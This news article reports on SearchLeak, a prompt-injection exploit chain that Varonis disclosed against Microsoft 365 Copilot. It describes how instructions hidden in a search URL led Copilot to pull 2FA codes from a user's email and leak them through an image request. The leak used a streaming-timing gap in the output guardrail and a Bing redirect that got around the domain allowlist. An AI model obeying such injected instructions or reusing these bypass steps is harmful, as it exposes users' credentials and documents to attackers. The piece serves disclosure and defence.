Microsoft Copilot flaw let hackers steal 2FA codes in one click

Key Takeaways

• Security researchers at Varonis discovered a critical flaw in Microsoft 365 Copilot that could steal 2FA codes and sensitive data from enterprise emails
• The attack required only one click on a malicious link, with no additional user input needed
• Microsoft patched the vulnerability on June 10, but the exploit highlights fundamental security challenges in enterprise AI systems

A critical Microsoft 365 Copilot vulnerability allowed attackers to steal two-factor authentication codes, password reset links, and other sensitive data from enterprise emails. The victim had to do nothing more than click a single link. Varonis, the security firm that discovered the flaw, publicly disclosed the exploit chain on Monday after Microsoft patched it last Tuesday.

The attack, dubbed SearchLeak, chained together three separate flaws to bypass Microsoft's security guardrails. It exploited a fundamental weakness that plagues all large language models: they cannot reliably distinguish between instructions from the user and malicious commands embedded in content they process.

How did the SearchLeak exploit work?

Varonis researchers built an attack that required zero typing from the victim. An attacker sends an email containing a specially crafted URL pointing to Microsoft's own search functionality. When the target clicks the link, Copilot executes instructions hidden in the URL's query parameter.

Those instructions tell Copilot to search the user's emails, extract sensitive content like 2FA codes, and embed it in an image URL. Normally, Microsoft's guardrails would wrap Copilot's output in code blocks to prevent the browser from executing it. But the researchers found a timing flaw.

The protection only kicks in after Copilot finishes its "thinking" phase. During generation, Copilot streams raw HTML that the browser temporarily renders. By the time the guardrail wraps everything safely, the browser has already fired off an HTTP request containing the stolen data.

“The vulnerability demonstrates that simply 'grounding' LLMs in enterprise data isn't enough; we need new primitives to distinguish between user intent and data-borne instructions.”

— Security Researcher, Varonis Threat Labs

Why couldn't Microsoft's existing protections stop it?

Microsoft built multiple guardrails into Copilot. It restricts which external sites the AI can contact. It wraps output in code blocks to prevent HTML execution. It blocks the AI from sending emails or submitting forms. SearchLeak bypassed all of them.

The final obstacle was Copilot's content security policy, which blocks requests to untrusted domains. Varonis used Microsoft's own Bing search engine as a trampoline. Bing is on Copilot's whitelist. The exploit crafted an image request to Bing's reverse image search, which then redirected to the attacker's server. The stolen data rode along in the URL.

What data was at risk?

Because SearchLeak targeted Microsoft 365's Enterprise tier, the blast radius extended far beyond personal email. Researchers confirmed the exploit could surface:

• Two-factor authentication codes sent via email
• Password reset links
• Meeting invites and notes
• SharePoint documents and OneDrive files
• Any other content indexed by Microsoft 365

For organizations with deep Microsoft 365 integrations, the exposure could extend even wider. Anything the compromised user account could access, Copilot could exfiltrate.

The unsolved problem behind every LLM exploit

SearchLeak is not an isolated bug. It stems from what security researchers call prompt injection, a class of attack that has no known universal fix. LLMs process instructions and data in the same channel. When an attacker hides malicious instructions inside data the model is summarizing or responding to, the model often complies.

Microsoft and other LLM providers have resorted to layered guardrails: output filtering, domain restrictions, behavioral rules. But these are patches, not solutions. Each guardrail creates new attack surface. Researchers keep finding ways to chain bypasses together, as Varonis did with SearchLeak.

Community discussion on HackerNews and Reddit has focused on this architectural tension. Enterprise AI adoption is accelerating, but the security controls lag behind. Giving LLMs read and write access to sensitive data like MFA codes assumes input sanitization that does not exist yet.

Is Microsoft 365 Copilot safe to use now?

Microsoft patched the specific vulnerabilities SearchLeak exploited on June 10. Organizations running the latest version are protected against this particular attack chain. But the underlying prompt injection problem remains open.

Enterprises using Copilot should audit what data the AI can access. Limiting Copilot's reach to non-sensitive content reduces the blast radius of future exploits. Security teams should also monitor for unusual Copilot activity patterns that might indicate probing attempts.

Frequently Asked Questions

What was the Microsoft Copilot vulnerability?

A critical flaw that allowed attackers to steal 2FA codes, password reset links, and other sensitive data from enterprise Microsoft 365 accounts. The victim only needed to click one malicious link.

Has Microsoft fixed the Copilot security flaw?

Yes. Microsoft patched the specific vulnerabilities on June 10, 2026. Organizations running updated versions are protected against this exploit chain.

What is prompt injection in LLMs?

A class of attack where malicious instructions are hidden inside content an AI model processes. The model cannot distinguish these from legitimate user commands and often executes them.

Who discovered the SearchLeak vulnerability?

Security researchers at Varonis Threat Labs discovered and reported the vulnerability to Microsoft before publicly disclosing the details.

What enterprise data was at risk from SearchLeak?

Emails, 2FA codes, password reset links, meeting invites, SharePoint documents, OneDrive files, and any other content indexed by Microsoft 365 that the compromised user could access.

Source: Ars Technica